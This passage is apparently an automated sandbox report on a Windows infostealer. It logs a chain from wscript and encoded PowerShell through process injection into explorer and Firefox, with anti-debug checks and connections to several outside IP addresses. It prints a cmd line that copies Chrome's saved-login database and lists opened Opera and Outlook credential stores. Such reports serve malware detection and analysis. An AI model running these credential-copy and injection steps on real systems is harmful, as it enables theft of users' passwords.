Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFCAB70 mov eax, dword ptr fs:[00000030h] 27_2_1EFCAB70
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFCAB70 mov eax, dword ptr fs:[00000030h] 27_2_1EFCAB70
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFCAB70 mov eax, dword ptr fs:[00000030h] 27_2_1EFCAB70
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFCAB70 mov eax, dword ptr fs:[00000030h] 27_2_1EFCAB70
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFCAB70 mov eax, dword ptr fs:[00000030h] 27_2_1EFCAB70
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFCAB70 mov eax, dword ptr fs:[00000030h] 27_2_1EFCAB70
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFC6B70 mov eax, dword ptr fs:[00000030h] 27_2_1EFC6B70
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFC6B70 mov eax, dword ptr fs:[00000030h] 27_2_1EFC6B70
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFC6B70 mov eax, dword ptr fs:[00000030h] 27_2_1EFC6B70
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFFBB5B mov esi, dword ptr fs:[00000030h] 27_2_1EFFBB5B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F07DAAF mov eax, dword ptr fs:[00000030h] 27_2_1F07DAAF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F067ABE mov eax, dword ptr fs:[00000030h] 27_2_1F067ABE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFFCB20 mov eax, dword ptr fs:[00000030h] 27_2_1EFFCB20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F094AE8 mov eax, dword ptr fs:[00000030h] 27_2_1F094AE8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFEEB1C mov eax, dword ptr fs:[00000030h] 27_2_1EFEEB1C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFBCB1E mov eax, dword ptr fs:[00000030h] 27_2_1EFBCB1E
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFC8B10 mov eax, dword ptr fs:[00000030h] 27_2_1EFC8B10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\chkdsk.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002F00 NtCreateFile,LdrInitializeThunk, 27_2_1F002F00

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Network Connect: 68.65.122.211 80
Source: C:\Windows\explorer.exe Network Connect: 217.160.0.18 80
Source: C:\Windows\explorer.exe Network Connect: 209.99.40.222 80
Source: C:\Windows\explorer.exe Network Connect: 199.192.29.215 80
Source: C:\Windows\explorer.exe Network Connect: 180.76.247.231 80
Source: C:\Windows\explorer.exe Network Connect: 185.53.179.171 80
Source: C:\Windows\explorer.exe Network Connect: 198.23.49.173 80
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: BA0000
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\chkdsk.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF62D2D0000
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded #Nandinme5 Bobleka Artikuler hotm Formnin4 Vigesimoki6 stom Echinit6 pronativ Pyro Texttv7 Elevatorfr RAMRODSA Qekursuss beanpo Skrk2 polari medeola Lora Raphi6 #defa pied Tandkdsbe Unimmor Badgerb6 exclus Chondrog8 AEROLO FISHERMANI FAGINTEGR Incepto3 Snurl6 Bisexua dosser gavel metafore tran atak Seismi2 Nonfabul Digtek3 REGNSKA Phytome9 Murae Halv8 VOCIFERATE WOODCRAFT hardheart Knib sejt #Immervk8 Sprogfl REDSHI siffleus Super rifters Grouch Proeveti PROTENSI Lydbillede SUBELECTR Rammetchor CISSESAR Bred jordfste Antisens LOXO #Splurgypy7 Septen Dims Tebrevsunc2 Stttep2 likvide Aftvi pantog vejbyg coco ISBRY PASS Pinf munikat unse GULDR Melodiou panimete Raftesoste avancement Enteasubpr MYCE Tidlnnede3 odyssen dryptrren perso #horn Centr4 Henrykkesl8 FORDAMPNIN Intrafol Caldron infr valg SISYRI Genoako skadegrer Underafsni2 Vaccinat drillerier CHAI #Detoxif afmali Hmmetn Alkoholtyp9 linie TAARN mero Spectro8 stjern Positio Autobio utakne Humanhoo3 ompl Bevisfrels3 Brillefode6 EJENDOMS Turistk4 chantant bondesta BILFRAGTER SIDHEPRE #Skident aanderfiau Tallwoo5 vinologist LOYALE Valeri4 lavin Baar9 forventel Nonconv #PERSONNAV idemp start choyainti loxict Hestebre1 Foelebal Mois Lallet Obelisk3 drikk Lanasr #bestraalin STRMPEH VEDL Myelo Dish Accept1 Unpl3 ARBEJDSLSH Anmeldelse SKOVHYTTE prsteskab Publicis8 Umindel4 #sportsma Dkningss4 Deposi1 regningsfu suspe Deba requir Saltstenm1 RDEPANGI #Selvmodsig SUBD kvksfinge Anom thailnde Ondu nonp WINDB
Source: C:\Windows\SysWOW64\chkdsk.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF62D2D0000 value starts with: 4D5A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Thread register set: target process: 4828
Source: C:\Windows\SysWOW64\chkdsk.exe Thread register set: target process: 4828
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "[Base64-encoded command blob removed]
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2E9C.tmp" "c:\Users\user\AppData\Local\Temp\gkb1wfd4\CSC1FB6CDA7423C41F280B0C76B8C389BB7.TMP"
Source: C:\Windows\SysWOW64\chkdsk.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\chkdsk.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
Source: explorer.exe, 0000001C.00000000.1713037209.0000000001250000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.2196285943.0000000001250000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.1859640845.0000000001250000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 0000001C.00000000.1812351909.000000000D42A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1720682575.00000000048E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2204978943.00000000048E0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000001C.00000000.1713037209.0000000001250000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.2196285943.0000000001250000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.1859640845.0000000001250000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000001C.00000000.2193873777.0000000000B88000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1710641976.0000000000B88000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1857434074.0000000000B88000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1Progman
Source: explorer.exe, 0000001C.00000000.1713037209.0000000001250000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.2196285943.0000000001250000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.1859640845.0000000001250000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_08350420 CreateNamedPipeW, 13_2_08350420

Stealing of Sensitive Information

Source: Yara match File source: 0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.1967295052.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.5728868975.0000000000B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.1993285562.000000001EC30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.1804806657.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\chkdsk.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\chkdsk.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data

Remote Access Functionality

Source: Yara match File source: 0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.1967295052.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.5728868975.0000000000B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.1993285562.000000001EC30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.1804806657.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY